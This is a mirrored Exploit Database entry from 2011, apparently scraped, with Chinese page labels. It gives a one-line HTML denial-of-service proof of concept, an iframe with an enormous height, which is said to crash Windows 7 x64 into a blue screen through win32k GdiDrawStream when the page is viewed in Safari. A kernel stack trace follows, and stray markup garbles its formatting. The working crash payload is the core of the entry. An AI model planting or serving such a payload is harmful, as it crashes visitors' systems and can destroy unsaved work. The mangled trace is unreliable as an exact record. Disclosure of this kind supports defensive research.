Apple Safari – GdiDrawStream Blue Screen of Death

• Exploit Database
• 102 阅读

• 作者： webDEViL
  日期： 2011-12-18
• 类别：

  • dos
  平台：

  • windows_x86-64
• 来源：https://www.exploit-db.com/exploits/18275/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  # Exploit Title: GdiDrawStream BSoD # Date: 18-12-2011 # Author: webDEViL # Version: Latest # Tested on: Windows 7 x64 using Safari # http://twitter.com/w3bd3vil   <iframe height=&apos;18082563&apos;></iframe>     ---#--- STACK_TEXT: fffff880<code>08b50f78 fffff800</code>0328e3bf : 00000000<code>00000050 fffff904</code>c2730258 00000000<code>00000001 fffff880</code>08b510e0 : nt!KeBugCheckEx fffff880<code>08b50f80 fffff800</code>032e1d6e : 00000000<code>00000001 fffff904</code>c2730258 00000000<code>00002700 fffff880</code>08b51380 : nt! ?? ::FNODOBFM::<code>string&apos;+0x44791 fffff880</code>08b510e0 fffff960<code>00164e2e : fffff960</code>00280a11 fffff900<code>c1f11320 fffff900</code>c273fe38 00000000<code>28451d38 : nt!KiPageFault+0x16e fffff880</code>08b51278 fffff960<code>00280a11 : fffff900</code>c1f11320 fffff900<code>c273fe38 00000000</code>28451d38 00000011<code>00000001 : win32k!memmove+0x25e fffff880</code>08b51280 fffff960<code>00280ca2 : fffff880</code>08b51380 00000000<code>000001dc fffff900</code>c2062c78 fffff904<code>c2730238 : win32k!NtGdiUpdateTransform+0x161 fffff880</code>08b512b0 fffff960<code>002815e4 : 00000000</code>000001dc fffff902<code>c2734638 00000000</code>0009f580 00000000<code>00000000 : win32k!NtGdiUpdateTransform+0x3f2 fffff880</code>08b51310 fffff960<code>00281854 : fffff900</code>c2730018 fffff900<code>c2062978 00000000</code>fffffff2 fffff900<code>00000001 : win32k!NtGdiUpdateTransform+0xd34 fffff880</code>08b514f0 fffff960<code>0028208e : fffff900</code>c1d1a028 00000000<code>00000000 fffff900</code>c2730018 00000000<code>00000000 : win32k!NtGdiUpdateTransform+0xfa4 fffff880</code>08b515b0 fffff960<code>002821fd : fffff900</code>c1d1a028 fffff900<code>c2062978 00000000</code>0009f580 fffff900<code>c1f11320 : win32k!NtGdiUpdateTransform+0x17de fffff880</code>08b516d0 fffff960<code>002823bc : fffff900</code>c00c0010 00000000<code>0000003c fffff880</code>08b51b20 fffff900<code>c1d1a010 : win32k!EngNineGrid+0xb1 fffff880</code>08b51770 fffff960<code>00282879 : 00000000</code>00000000 fffff900<code>c2062978 00000000</code>00000000 fffff900<code>c1d1a010 : win32k!EngDrawStream+0x1a0 fffff880</code>08b51820 fffff960<code>002831cb : fffff880</code>08b51938 00000000<code>00000000 fffff900</code>c2062960 fffff900<code>c1f11320 : win32k!NtGdiDrawStreamInternal+0x47d fffff880</code>08b518d0 fffff960<code>0029e93c : 00000000</code>3f010ad8 00000000<code>00000000 fffff880</code>08b51af0 fffff960<code>00000000 : win32k!GreDrawStream+0x917 fffff880</code>08b51ac0 fffff800<code>032e2ed3 : fffffa80</code>09777b60 00000000<code>00010000 00000000</code>000309c0 00000000<code>7efdb000 : win32k!NtGdiDrawStream+0x9c fffff880</code>08b51c20 00000000<code>73f003fa : 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 : nt!KiSystemServiceCopyEnd+0x13 00000000</code>0021dd78 00000000<code>00000000 : 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 00000000`00000000 : 0x73f003fa ---#---